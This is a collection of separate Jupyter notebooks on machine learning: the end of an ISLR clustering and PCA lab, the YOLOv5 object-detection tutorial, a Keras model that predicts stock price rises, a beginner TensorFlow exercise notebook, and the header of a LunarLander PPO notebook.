ax1.scatter(km1.cluster_centers_[:,0], km1.cluster_centers_[:,1], marker='+', s=100, c='k', linewidth=2)
ax2.scatter(X[:,0], X[:,1], s=40, c=km2.labels_, cmap=plt.cm.prism)
ax2.set_title('K-Means Clustering Results with K=3')
ax2.scatter(km2.cluster_centers_[:,0], km2.cluster_centers_[:,1], marker='+', s=100, c='k', linewidth=2);
```
### 10.5.3 Hierarchical Clustering
#### scipy
```
fig, (ax1,ax2,ax3) = plt.subplots(3,1, figsize=(15,18))
for linkage, cluster, ax in zip([hierarchy.complete(X), hierarchy.average(X), hierarchy.single(X)], ['c1','c2','c3'],
[ax1,ax2,ax3]):
cluster = hierarchy.dendrogram(linkage, ax=ax, color_threshold=0)
ax1.set_title('Complete Linkage')
ax2.set_title('Average Linkage')
ax3.set_title('Single Linkage');
```
## Lab 3: NCI60 Data Example
### § 10.6.1 PCA
```
# In R, I exported the two elements of this ISLR dataset to csv files.
# There is one file for the features and another file for the classes/types.
df2 = pd.read_csv('Data/NCI60_X.csv').drop('Unnamed: 0', axis=1)
df2.columns = np.arange(df2.columns.size)
df2.info()
X = pd.DataFrame(scale(df2))
X.shape
y = pd.read_csv('Data/NCI60_y.csv', usecols=[1], skiprows=1, names=['type'])
y.shape
y.type.value_counts()
# Fit the PCA model and transform X to get the principal components
pca2 = PCA()
df2_plot = pd.DataFrame(pca2.fit_transform(X))
fig, (ax1, ax2) = plt.subplots(1,2, figsize=(15,6))
color_idx = pd.factorize(y.type)[0]
cmap = plt.cm.hsv
# Left plot
ax1.scatter(df2_plot.iloc[:,0], -df2_plot.iloc[:,1], c=color_idx, cmap=cmap, alpha=0.5, s=50)
ax1.set_ylabel('Principal Component 2')
# Right plot
ax2.scatter(df2_plot.iloc[:,0], df2_plot.iloc[:,2], c=color_idx, cmap=cmap, alpha=0.5, s=50)
ax2.set_ylabel('Principal Component 3')
# Custom legend for the classes (y) since we do not create scatter plots per class (which could have their own labels).
handles = []
labels = pd.factorize(y.type.unique())
norm = mpl.colors.Normalize(vmin=0.0, vmax=14.0)
for i, v in zip(labels[0], labels[1]):
handles.append(mpl.patches.Patch(color=cmap(norm(i)), label=v, alpha=0.5))
ax2.legend(handles=handles, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
# xlabel for both plots
for ax in fig.axes:
ax.set_xlabel('Principal Component 1')
pd.DataFrame([df2_plot.iloc[:,:5].std(axis=0, ddof=0).as_matrix(),
pca2.explained_variance_ratio_[:5],
np.cumsum(pca2.explained_variance_ratio_[:5])],
index=['Standard Deviation', 'Proportion of Variance', 'Cumulative Proportion'],
columns=['PC1', 'PC2', 'PC3', 'PC4', 'PC5'])
df2_plot.iloc[:,:10].var(axis=0, ddof=0).plot(kind='bar', rot=0)
plt.ylabel('Variances');
fig , (ax1,ax2) = plt.subplots(1,2, figsize=(15,5))
# Left plot
ax1.plot(pca2.explained_variance_ratio_, '-o')
ax1.set_ylabel('Proportion of Variance Explained')
ax1.set_ylim(ymin=-0.01)
# Right plot
ax2.plot(np.cumsum(pca2.explained_variance_ratio_), '-ro')
ax2.set_ylabel('Cumulative Proportion of Variance Explained')
ax2.set_ylim(ymax=1.05)
for ax in fig.axes:
ax.set_xlabel('Principal Component')
ax.set_xlim(-1,65)
```
### § 10.6.2 Clustering
```
X= pd.DataFrame(scale(df2), index=y.type, columns=df2.columns)
fig, (ax1,ax2,ax3) = plt.subplots(1,3, figsize=(20,20))
for linkage, cluster, ax in zip([hierarchy.complete(X), hierarchy.average(X), hierarchy.single(X)],
['c1','c2','c3'],
[ax1,ax2,ax3]):
cluster = hierarchy.dendrogram(linkage, labels=X.index, orientation='right', color_threshold=0, leaf_font_size=10, ax=ax)
ax1.set_title('Complete Linkage')
ax2.set_title('Average Linkage')
ax3.set_title('Single Linkage');
plt.figure(figsize=(10,20))
cut4 = hierarchy.dendrogram(hierarchy.complete(X),
labels=X.index, orientation='right', color_threshold=140, leaf_font_size=10)
plt.vlines(140,0,plt.gca().yaxis.get_data_interval()[1], colors='r', linestyles='dashed');
```
##### KMeans
```
np.random.seed(2)
km4 = KMeans(n_clusters=4, n_init=50)
km4.fit(X)
km4.labels_
# Observations per KMeans cluster
pd.Series(km4.labels_).value_counts().sort_index()
```
##### Hierarchical
```
# Observations per Hierarchical cluster
cut4b = hierarchy.dendrogram(hierarchy.complete(X), truncate_mode='lastp', p=4, show_leaf_counts=True)
# Hierarchy based on Principal Components 1 to 5
plt.figure(figsize=(10,20))
pca_cluster = hierarchy.dendrogram(hierarchy.complete(df2_plot.iloc[:,:5]), labels=y.type.values, orientation='right', color_threshold=100, leaf_font_size=10)
cut4c = hierarchy.dendrogram(hierarchy.complete(df2_plot), truncate_mode='lastp', p=4,
show_leaf_counts=True)
# See also color coding in plot above.
```
| github_jupyter |
<a href="https://colab.research.google.com/github/ultralytics/yolov5/blob/master/tutorial.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
<img src="https://user-images.githubusercontent.com/26833433/98702494-b71c4e80-237a-11eb-87ed-17fcd6b3f066.jpg">
This is the **official YOLOv5 🚀 notebook** authored by **Ultralytics**, and is freely available for redistribution under the [GPL-3.0 license](https://choosealicense.com/licenses/gpl-3.0/).
For more information please visit https://github.com/ultralytics/yolov5 and https://www.ultralytics.com. Thank you!
# Setup
Clone repo, install dependencies and check PyTorch and GPU.
```
!git clone https://github.com/ultralytics/yolov5 # clone repo
%cd yolov5
%pip install -qr requirements.txt # install dependencies
import torch
from IPython.display import Image, clear_output # to display images
clear_output()
print(f"Setup complete. Using torch {torch.__version__} ({torch.cuda.get_device_properties(0).name if torch.cuda.is_available() else 'CPU'})")
```
# 1. Inference
`detect.py` runs YOLOv5 inference on a variety of sources, downloading models automatically from the [latest YOLOv5 release](https://github.com/ultralytics/yolov5/releases), and saving results to `runs/detect`. Example inference sources are:
<img src="https://user-images.githubusercontent.com/26833433/114307955-5c7e4e80-9ae2-11eb-9f50-a90e39bee53f.png" width="900">
```
!python detect.py --weights yolov5s.pt --img 640 --conf 0.25 --source data/images/
Image(filename='runs/detect/exp/zidane.jpg', width=600)
```
# 2. Test
Test a model's accuracy on [COCO](https://cocodataset.org/#home) val or test-dev datasets. Models are downloaded automatically from the [latest YOLOv5 release](https://github.com/ultralytics/yolov5/releases). To show results by class use the `--verbose` flag. Note that `pycocotools` metrics may be ~1% better than the equivalent repo metrics, as is visible below, due to slight differences in mAP computation.
## COCO val2017
Download [COCO val 2017](https://github.com/ultralytics/yolov5/blob/74b34872fdf41941cddcf243951cdb090fbac17b/data/coco.yaml#L14) dataset (1GB - 5000 images), and test model accuracy.
```
# Download COCO val2017
torch.hub.download_url_to_file('https://github.com/ultralytics/yolov5/releases/download/v1.0/coco2017val.zip', 'tmp.zip')
!unzip -q tmp.zip -d ../ && rm tmp.zip
# Run YOLOv5x on COCO val2017
!python test.py --weights yolov5x.pt --data coco.yaml --img 640 --iou 0.65
```
## COCO test-dev2017
Download [COCO test2017](https://github.com/ultralytics/yolov5/blob/74b34872fdf41941cddcf243951cdb090fbac17b/data/coco.yaml#L15) dataset (7GB - 40,000 images), to test model accuracy on test-dev set (**20,000 images, no labels**). Results are saved to a `*.json` file which should be **zipped** and submitted to the evaluation server at https://competitions.codalab.org/competitions/20794.
```
# Download COCO test-dev2017
torch.hub.download_url_to_file('https://github.com/ultralytics/yolov5/releases/download/v1.0/coco2017labels.zip', 'tmp.zip')
!unzip -q tmp.zip -d ../ && rm tmp.zip # unzip labels
!f="test2017.zip" && curl http://images.cocodataset.org/zips/$f -o $f && unzip -q $f && rm $f # 7GB, 41k images
%mv ./test2017 ../coco/images # move to /coco
# Run YOLOv5s on COCO test-dev2017 using --task test
!python test.py --weights yolov5s.pt --data coco.yaml --task test
```
# 3. Train
Download [COCO128](https://www.kaggle.com/ultralytics/coco128), a small 128-image tutorial dataset, start tensorboard and train YOLOv5s from a pretrained checkpoint for 3 epochs (note actual training is typically much longer, around **300-1000 epochs**, depending on your dataset).
```
# Download COCO128
torch.hub.download_url_to_file('https://github.com/ultralytics/yolov5/releases/download/v1.0/coco128.zip', 'tmp.zip')
!unzip -q tmp.zip -d ../ && rm tmp.zip
```
Train a YOLOv5s model on [COCO128](https://www.kaggle.com/ultralytics/coco128) with `--data coco128.yaml`, starting from pretrained `--weights yolov5s.pt`, or from randomly initialized `--weights '' --cfg yolov5s.yaml`. Models are downloaded automatically from the [latest YOLOv5 release](https://github.com/ultralytics/yolov5/releases), and **COCO, COCO128, and VOC datasets are downloaded automatically** on first use.
All training results are saved to `runs/train/` with incrementing run directories, i.e. `runs/train/exp2`, `runs/train/exp3` etc.
```
# Tensorboard (optional)
%load_ext tensorboard
%tensorboard --logdir runs/train
# Weights & Biases (optional)
%pip install -q wandb
import wandb
wandb.login()
# Train YOLOv5s on COCO128 for 3 epochs
!python train.py --img 640 --batch 16 --epochs 3 --data coco128.yaml --weights yolov5s.pt --nosave --cache
```
# 4. Visualize
## Weights & Biases Logging 🌟 NEW
[Weights & Biases](https://wandb.ai/site?utm_campaign=repo_yolo_notebook) (W&B) is now integrated with YOLOv5 for real-time visualization and cloud logging of training runs. This allows for better run comparison and introspection, as well improved visibility and collaboration for teams. To enable W&B `pip install wandb`, and then train normally (you will be guided through setup on first use).
During training you will see live updates at [https://wandb.ai/home](https://wandb.ai/home?utm_campaign=repo_yolo_notebook), and you can create and share detailed [Reports](https://wandb.ai/glenn-jocher/yolov5_tutorial/reports/YOLOv5-COCO128-Tutorial-Results--VmlldzozMDI5OTY) of your results. For more information see the [YOLOv5 Weights & Biases Tutorial](https://github.com/ultralytics/yolov5/issues/1289).
<img src="https://user-images.githubusercontent.com/26833433/98184457-bd3da580-1f0a-11eb-8461-95d908a71893.jpg" width="800">
## Local Logging
All results are logged by default to `runs/train`, with a new experiment directory created for each new training as `runs/train/exp2`, `runs/train/exp3`, etc. View train and test jpgs to see mosaics, labels, predictions and augmentation effects. Note a **Mosaic Dataloader** is used for training (shown below), a new concept developed by Ultralytics and first featured in [YOLOv4](https://arxiv.org/abs/2004.10934).
```
Image(filename='runs/train/exp/train_batch0.jpg', width=800) # train batch 0 mosaics and labels
Image(filename='runs/train/exp/test_batch0_labels.jpg', width=800) # test batch 0 labels
Image(filename='runs/train/exp/test_batch0_pred.jpg', width=800) # test batch 0 predictions
```
> <img src="https://user-images.githubusercontent.com/26833433/83667642-90fcb200-a583-11ea-8fa3-338bbf7da194.jpeg" width="750">
`train_batch0.jpg` shows train batch 0 mosaics and labels
> <img src="https://user-images.githubusercontent.com/26833433/83667626-8c37fe00-a583-11ea-997b-0923fe59b29b.jpeg" width="750">
`test_batch0_labels.jpg` shows test batch 0 labels
> <img src="https://user-images.githubusercontent.com/26833433/83667635-90641b80-a583-11ea-8075-606316cebb9c.jpeg" width="750">
`test_batch0_pred.jpg` shows test batch 0 _predictions_
Training losses and performance metrics are also logged to [Tensorboard](https://www.tensorflow.org/tensorboard) and a custom `results.txt` logfile which is plotted as `results.png` (below) after training completes. Here we show YOLOv5s trained on COCO128 to 300 epochs, starting from scratch (blue), and from pretrained `--weights yolov5s.pt` (orange).
```
from utils.plots import plot_results
plot_results(save_dir='runs/train/exp') # plot all results*.txt as results.png
Image(filename='runs/train/exp/results.png', width=800)
```
<img src="https://user-images.githubusercontent.com/26833433/97808309-8182b180-1c66-11eb-8461-bffe1a79511d.png" width="800">
# Environments
YOLOv5 may be run in any of the following up-to-date verified environments (with all dependencies including [CUDA](https://developer.nvidia.com/cuda)/[CUDNN](https://developer.nvidia.com/cudnn), [Python](https://www.python.org/) and [PyTorch](https://pytorch.org/) preinstalled):
- **Google Colab and Kaggle** notebooks with free GPU: <a href="https://colab.research.google.com/github/ultralytics/yolov5/blob/master/tutorial.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> <a href="https://www.kaggle.com/ultralytics/yolov5"><img src="https://kaggle.com/static/images/open-in-kaggle.svg" alt="Open In Kaggle"></a>
- **Google Cloud** Deep Learning VM. See [GCP Quickstart Guide](https://github.com/ultralytics/yolov5/wiki/GCP-Quickstart)
- **Amazon** Deep Learning AMI. See [AWS Quickstart Guide](https://github.com/ultralytics/yolov5/wiki/AWS-Quickstart)
- **Docker Image**. See [Docker Quickstart Guide](https://github.com/ultralytics/yolov5/wiki/Docker-Quickstart) <a href="https://hub.docker.com/r/ultralytics/yolov5"><img src="https://img.shields.io/docker/pulls/ultralytics/yolov5?logo=docker" alt="Docker Pulls"></a>
# Status

If this badge is green, all [YOLOv5 GitHub Actions](https://github.com/ultralytics/yolov5/actions) Continuous Integration (CI) tests are currently passing. CI tests verify correct operation of YOLOv5 training ([train.py](https://github.com/ultralytics/yolov5/blob/master/train.py)), testing ([test.py](https://github.com/ultralytics/yolov5/blob/master/test.py)), inference ([detect.py](https://github.com/ultralytics/yolov5/blob/master/detect.py)) and export ([export.py](https://github.com/ultralytics/yolov5/blob/master/models/export.py)) on MacOS, Windows, and Ubuntu every 24 hours and on every commit.
# Appendix
Optional extras below. Unit tests validate repo functionality and should be run on any PRs submitted.
```
# Re-clone repo
%cd ..
%rm -rf yolov5 && git clone https://github.com/ultralytics/yolov5
%cd yolov5
# Reproduce
for x in 'yolov5s', 'yolov5m', 'yolov5l', 'yolov5x':
!python test.py --weights {x}.pt --data coco.yaml --img 640 --conf 0.25 --iou 0.45 # speed
!python test.py --weights {x}.pt --data coco.yaml --img 640 --conf 0.001 --iou 0.65 # mAP
# PyTorch Hub
import torch
# Model
model = torch.hub.load('ultralytics/yolov5', 'yolov5s')
# Images
dir = 'https://github.com/ultralytics/yolov5/raw/master/data/images/'
imgs = [dir + f for f in ('zidane.jpg', 'bus.jpg')] # batch of images
# Inference
results = model(imgs)
results.print() # or .show(), .save()
# Unit tests
%%shell
export PYTHONPATH="$PWD" # to run *.py. files in subdirectories
rm -rf runs # remove runs/
for m in yolov5s; do # models
python train.py --weights $m.pt --epochs 3 --img 320 --device 0 # train pretrained
python train.py --weights '' --cfg $m.yaml --epochs 3 --img 320 --device 0 # train scratch
for d in 0 cpu; do # devices
python detect.py --weights $m.pt --device $d # detect official
python detect.py --weights runs/train/exp/weights/best.pt --device $d # detect custom
python test.py --weights $m.pt --device $d # test official
python test.py --weights runs/train/exp/weights/best.pt --device $d # test custom
done
python hubconf.py # hub
python models/yolo.py --cfg $m.yaml # inspect
python models/export.py --weights $m.pt --img 640 --batch 1 # export
done
# Profile
from utils.torch_utils import profile
m1 = lambda x: x * torch.sigmoid(x)
m2 = torch.nn.SiLU()
profile(x=torch.randn(16, 3, 640, 640), ops=[m1, m2], n=100)
# Evolve
!python train.py --img 640 --batch 64 --epochs 100 --data coco128.yaml --weights yolov5s.pt --cache --noautoanchor --evolve
!d=runs/train/evolve && cp evolve.* $d && zip -r evolve.zip $d && gsutil mv evolve.zip gs://bucket # upload results (optional)
# VOC
for b, m in zip([64, 48, 32, 16], ['yolov5s', 'yolov5m', 'yolov5l', 'yolov5x']): # zip(batch_size, model)
!python train.py --batch {b} --weights {m}.pt --data voc.yaml --epochs 50 --cache --img 512 --nosave --hyp hyp.finetune.yaml --project VOC --name {m}
```
| github_jupyter |
```
# TO DO: Pull from API
# Library Imports
import datetime
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import random
import tensorflow
import warnings
from keras import optimizers
from keras.layers import Dense, Dropout, Activation
from keras.models import Sequential
from keras.models import load_model
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.preprocessing import StandardScaler
warnings.filterwarnings('ignore')
# Import the dataset
dataset = pd.read_csv('data/GOOG.csv')
dataset = dataset[['Open', 'High', 'Low', 'Close']]
# Feature Engineering
dataset['H-L'] = dataset['High'] - dataset['Low']
dataset['O-C'] = dataset['Close'] - dataset['Open']
dataset['3day MA'] = dataset['Close'].shift(1).rolling(window = 3).mean()
dataset['10day MA'] = dataset['Close'].shift(1).rolling(window = 10).mean()
dataset['30day MA'] = dataset['Close'].shift(1).rolling(window = 30).mean()
dataset['Std_dev']= dataset['Close'].rolling(5).std()
'''
Identify price rises. Using a binary variable, 1, to indicate when
the closing price of the next day is greater than the closing price of prior day.
'''
dataset['Price_Rise'] = np.where(dataset['Close'].shift(-1) > dataset['Close'], 1, 0)
# Drop NAN values
dataset = dataset.dropna()
dataset.head()
# Seperate target variable and drop target variable from df
df = dataset.drop('Price_Rise', axis=1)
y = dataset['Price_Rise']
# Split the Dataset
X_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.20,
random_state=42)
'''
Establish a Baseline & Domain Insight:
Objective: to accomplish a better accuracy % then our baseline of 51.7 pct.
Why such a low baseline? Casino's make their money with 51%/49% odds. Any rate
better then a 51% accuracy rate should be considered as a success.
'''
y_train.value_counts(normalize=True)
'''
Feature Scaling and Standardizing:
This ensures that there is no bias while training the model due to the
different scales of all input features. If this is not done the neural
network might get confused and give a higher weight to those features
which have a higher average value than others.
'''
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
'''
NN Notes:
Units: This defines the number of nodes or neurons in that particular layer.
We have set this value to 128, meaning there will be 128 neurons in our hidden layer.
Kernel_initializer: This defines the starting values for the weights of the
different neurons in the hidden layer. We have defined this to be ‘uniform’,
which means that the weights will be initialized with values from a uniform distribution.
Activation: This is the activation function for the neurons in the particular hidden layer.
Here we define the function as the rectified Linear Unit function or ‘relu’.
Inputs: This defines the number of inputs to the hidden layer, we have defined this
value to be equal to the number of columns of our input feature dataframe.
This argument will not be required in the subsequent layers, as the model will know
how many outputs the previous layer produced.
'''
'''
Variables for NN - Adjust as neccessary.
'''
epochs = 100
batch_size = 10
inputs = X_train.shape[1]
'''
A breakdown of the NN Architecture
'''
model = Sequential()
# Two Hidden Layers
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
# Output Layer
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
# Compile the Model
model.compile(optimizer='adam',
loss='mean_squared_error',
metrics=['acc'])
'''
Builds a function for our model, incorporates tensorboard for visual analysis
'''
def create_model():
model = Sequential()
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
model.compile(optimizer='adam',
loss='mean_squared_error',
metrics=['acc'])
return model
# Fit and Train Model
model.fit(X_train, y_train,
batch_size = batch_size,
epochs = epochs)
# hyperparameter tuning
def create_model():
model = Sequential()
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
model.compile(optimizer='adam',
loss='mean_squared_error',
metrics=['acc'])
return model
# prep for grid search
clf = KerasClassifier(build_fn=create_model, verbose=0)
# define Grid Search params
param_grid = {'batch_size': [20, 60, 80, 100, 200],
'epochs': [20]}
grid = GridSearchCV(estimator=clf,
param_grid=param_grid,
n_jobs=1)
grid_result = grid.fit(X_train, y_train)
# report results
print(f"Best: {grid_result.best_score_} using {grid_result.best_params_}")
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print(f"Means: {mean}, Stdev: {stdev} with: {param}")
# tune optimizer
from tensorflow.keras import optimizers
def create_model(learn_rate=0.001):
model = Sequential()
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
model.compile(optimizer=optimizers.Adam(lr=learn_rate),
loss='mean_squared_error',
metrics=['acc'])
return model
# prepare for grid search
clf = KerasClassifier(build_fn=create_model, verbose=0)
# optimize with optimizer
param_grid = {'batch_size': [20],
'epochs': [20],
'learn_rate': [0.001, 0.01, 0.1, 0.2, 0.3, 0.5]}
grid = GridSearchCV(estimator=clf,
param_grid=param_grid,
n_jobs=1)
grid_result = grid.fit(X_train, y_train)
# report results
print(f"Best: {grid_result.best_score_} using {grid_result.best_params_}")
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print(f"Means: {mean}, Stdev: {stdev} with: {param}")
# tune epochs and save final model for future use
def create_model():
model = Sequential()
model.add(Dense(128, activation='relu', input_shape=(inputs,)))
model.add(Dense(128, activation='relu'))
model.add(Dense(1, kernel_initializer='uniform', activation='sigmoid'))
model.compile(optimizer=optimizers.Adam(lr=0.01),
loss='mean_squared_error',
metrics=['acc'])
return model
# prepare for grid search
clf = KerasClassifier(build_fn=create_model, verbose=0)
# define grid search params
param_grid = {'batch_size': [20],
'epochs': [50, 100, 200, 500]}
grid = GridSearchCV(estimator=clf,
param_grid=param_grid,
n_jobs=1)
grid_result = grid.fit(X_train, y_train)
# Report Results
print(f"Best: {grid_result.best_score_} using {grid_result.best_params_}")
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print(f"Means: {mean}, Stdev: {stdev} with: {param}")
# fit final model and evaluate results
model.fit(X_train, y_train,
batch_size=20,
epochs=500)
# Save final model for future use
model.save('./models/goog_model.h5')
'''
Predict the Movement of Stock:
Now that the neural network has been compiled, use the predict() method for making the prediction.
Pass X_test as its argument and store the result in a variable named ypred.
Then convert ypred to store binary values by storing the condition ypred > 5.
Now, the variable y_pred stores either True or False depending on whether the
predicted value was greater or less than 0.5.
'''
y_pred = model.predict(X_test)
y_pred = (y_pred > 0.5)
'''
Next, create a new column in the dataframe dataset with the column header ‘ypred’
and store NaN values in the column.
Then store the values of ypred into this new column, starting from the rows of the test dataset.
This is done by slicing the dataframe using the iloc method as shown in the code below.
Then drop all the NaN values from the dataset and store them in a new dataframe named trade_dataset.
'''
dataset['y_pred'] = np.NaN
dataset.iloc[(len(dataset) - len(y_pred)):,-1:] = y_pred
trade_dataset = dataset.dropna()
# Computing Strategy Returns
trade_dataset['Tomorrows Returns'] = 0.
trade_dataset['Tomorrows Returns'] = np.log(trade_dataset['Close']/trade_dataset['Close'].shift(1))
trade_dataset['Tomorrows Returns'] = trade_dataset['Tomorrows Returns'].shift(-1)
trade_dataset['Strategy Returns'] = 0.
trade_dataset['Strategy Returns'] = np.where(trade_dataset['y_pred'] == True, trade_dataset['Tomorrows Returns'], - trade_dataset['Tomorrows Returns'])
trade_dataset['Cumulative Market Returns'] = np.cumsum(trade_dataset['Tomorrows Returns'])
trade_dataset['Cumulative Strategy Returns'] = np.cumsum(trade_dataset['Strategy Returns'])
# Graph the Results
plt.figure(figsize=(10,5))
plt.plot(trade_dataset['Cumulative Market Returns'], color='r', label='Market Returns')
plt.plot(trade_dataset['Cumulative Strategy Returns'], color='g', label='Strategy Returns')
plt.legend()
plt.show()
# Consider: Gather more data points (+100,000) for a more accurate model
```
| github_jupyter |

# <center> "Hello World" in TensorFlow - Exercise Notebook</center>
#### Before everything, let's import the TensorFlow library
```
%matplotlib inline
import tensorflow as tf
```
### First, try to add the two constants and print the result.
```
a = tf.constant([5])
b = tf.constant([2])
```
create another TensorFlow object applying the sum (+) operation:
```
#Your code goes here
c = tf.add(a,b)
```
<div align="right">
<a href="#sum1" class="btn btn-default" data-toggle="collapse">Click here for the solution #1</a>
<a href="#sum2" class="btn btn-default" data-toggle="collapse">Click here for the solution #2</a>
</div>
<div id="sum1" class="collapse">
```
c=a+b
```
</div>
<div id="sum2" class="collapse">
```
c=tf.add(a,b)
```
</div>
```
with tf.Session() as session:
result = session.run(c)
print "The addition of this two constants is: {0}".format(result)
```
---
### Now let's try to multiply them.
```
# Your code goes here. Use the multiplication operator.
c = tf.multiply(a,b)
```
<div align="right">
<a href="#mult1" class="btn btn-default" data-toggle="collapse">Click here for the solution #1</a>
<a href="#mult2" class="btn btn-default" data-toggle="collapse">Click here for the solution #2</a>
</div>
<div id="mult1" class="collapse">
```
c=a*b
```
</div>
<div id="mult2" class="collapse">
```
c=tf.multiply(a,b)
```
</div>
```
with tf.Session() as session:
result = session.run(c)
print "The Multiplication of this two constants is: {0}".format(result)
```
### Multiplication: element-wise or matrix multiplication
Let's practice the different ways to multiply matrices:
- **Element-wise** multiplication in the **first operation** ;
- **Matrix multiplication** on the **second operation** ;
```
matrixA = tf.constant([[2,3],[3,4]])
matrixB = tf.constant([[2,3],[3,4]])
# Your code goes here
first_operation = tf.multiply(matrixA, matrixB)
second_operation=tf.matmul(matrixA,matrixB)
```
<div align="right">
<a href="#matmul1" class="btn btn-default" data-toggle="collapse">Click here for the solution</a>
</div>
<div id="matmul1" class="collapse">
```
first_operation=tf.multiply(matrixA, matrixB)
second_operation=tf.matmul(matrixA,matrixB)
```
</div>
```
with tf.Session() as session:
result = session.run(first_operation)
print "Element-wise multiplication: \n", result
result = session.run(second_operation)
print "Matrix Multiplication: \n", result
```
---
### Modify the value of variable b to the value in constant a:
```
a=tf.constant(1000)
b=tf.Variable(0)
init_op = tf.global_variables_initializer()
# Your code goes here
update = tf.assign(b,a)
with tf.Session() as session:
session.run(init_op)
session.run(update)
print(session.run(b))
```
<div align="right">
<a href="#assign" class="btn btn-default" data-toggle="collapse">Click here for the solution</a>
</div>
<div id="assign" class="collapse">
```
a=tf.constant(1000)
b=tf.Variable(0)
init_op = tf.global_variables_initializer()
update = tf.assign(b,a)
with tf.Session() as session:
session.run(init_op)
session.run(update)
print(session.run(b))
```
</div>
---
### Fibonacci sequence
Now try to do something more advanced. Try to create a __fibonnacci sequence__ and print the first few values using TensorFlow:</b></h3>
If you don't know, the fibonnacci sequence is defined by the equation: <br><br>
$$F_{n} = F_{n-1} + F_{n-2}$$<br>
Resulting in a sequence like: 1,1,2,3,5,8,13,21...
```
a=tf.Variable(0)
b=tf.Variable(1)
temp=tf.Variable(0)
c=a+b
update1=tf.assign(temp,c)
update2=tf.assign(a,b)
update3=tf.assign(b,temp)
init_op = tf.global_variables_initializer()
with tf.Session() as s:
s.run(init_op)
for _ in range(15):
print(s.run(a))
s.run(update1)
s.run(update2)
s.run(update3)
```
<div align="right">
<a href="#fibonacci-solution" class="btn btn-default" data-toggle="collapse">Click here for the solution #1</a>
<a href="#fibonacci-solution2" class="btn btn-default" data-toggle="collapse">Click here for the solution #2</a>
</div>
<div id="fibonacci-solution" class="collapse">
```
a=tf.Variable(0)
b=tf.Variable(1)
temp=tf.Variable(0)
c=a+b
update1=tf.assign(temp,c)
update2=tf.assign(a,b)
update3=tf.assign(b,temp)
init_op = tf.initialize_all_variables()
with tf.Session() as s:
s.run(init_op)
for _ in range(15):
print(s.run(a))
s.run(update1)
s.run(update2)
s.run(update3)
```
</div>
<div id="fibonacci-solution2" class="collapse">
```
f = [tf.constant(1),tf.constant(1)]
for i in range(2,10):
temp = f[i-1] + f[i-2]
f.append(temp)
with tf.Session() as sess:
result = sess.run(f)
print result
```
</div>
---
### Now try to create your own placeholders and define any kind of operation between them:
```
# Your code goes here
a=tf.placeholder(tf.float32)
b=tf.placeholder(tf.float32)
c=2*a -b
dictionary = {a:[2,2],b:[3,4]}
with tf.Session() as session:
print session.run(c,feed_dict=dictionary)
```
<div align="right">
<a href="#placeholder" class="btn btn-default" data-toggle="collapse">Click here for the solution</a>
</div>
<div id="placeholder" class="collapse">
```
a=tf.placeholder(tf.float32)
b=tf.placeholder(tf.float32)
c=2*a -b
dictionary = {a:[2,2],b:[3,4]}
with tf.Session() as session:
print session.run(c,feed_dict=dictionary)
```
</div>
### Try changing our example with some other operations and see the result.
<div class="alert alert-info alertinfo">
<font size = 3><strong>Some examples of functions:</strong></font>
<br>
tf.multiply(x, y)<br />
tf.div(x, y)<br />
tf.square(x)<br />
tf.sqrt(x)<br />
tf.pow(x, y)<br />
tf.exp(x)<br />
tf.log(x)<br />
tf.cos(x)<br />
tf.sin(x)<br /> <br>
You can also take a look at [more operations]( https://www.tensorflow.org/versions/r0.9/api_docs/python/math_ops.html)
</div>
```
a = tf.constant(5.)
b = tf.constant(2.)
```
create a variable named **`c`** to receive the result an operation (at your choice):
```
#your code goes here
c=tf.sin(a)
```
<div align="right">
<a href="#operations" class="btn btn-default" data-toggle="collapse">Click here for the solution</a>
</div>
<div id="operations" class="collapse">
```
c=tf.sin(a)
```
</div>
```
with tf.Session() as session:
result = session.run(c)
print "c =: {}".format(result)
```
They're really similar to mathematical functions the only difference is that operations works over tensors.
## Want to learn more?
Running deep learning programs usually needs a high performance platform. PowerAI speeds up deep learning and AI. Built on IBM's Power Systems, PowerAI is a scalable software platform that accelerates deep learning and AI with blazing performance for individual users or enterprises. The PowerAI platform supports popular machine learning libraries and dependencies including Tensorflow, Caffe, Torch, and Theano. You can download a [free version of PowerAI](https://cocl.us/ML0120EN_PAI).
Also, you can use Data Science Experience to run these notebooks faster with bigger datasets. Data Science Experience is IBM's leading cloud solution for data scientists, built by data scientists. With Jupyter notebooks, RStudio, Apache Spark and popular libraries pre-packaged in the cloud, DSX enables data scientists to collaborate on their projects without having to install anything. Join the fast-growing community of DSX users today with a free account at [Data Science Experience](https://cocl.us/ML0120EN_DSX)This is the end of this lesson. Hopefully, now you have a deeper and intuitive understanding regarding the LSTM model. Thank you for reading this notebook, and good luck on your studies.
### Thanks for completing this lesson!
| github_jupyter |
# LunarLander-v2
##Source
https://github.com/nikhilbarhate99/PPO-PyTorch/blob/master/PPO_continuous.py
(and the discrete: https://github.com/nikhilbarhate99/PPO-PyTorch/blob/master/PPO.py )
[source spec](https://github.com/nikhilbarhate99/PPO-PyTorch):
Python 3.6
PyTorch 1.0
NumPy 1.15.3
gym 0.10.8
Pillow 5.3.0
##description for the discrete prob
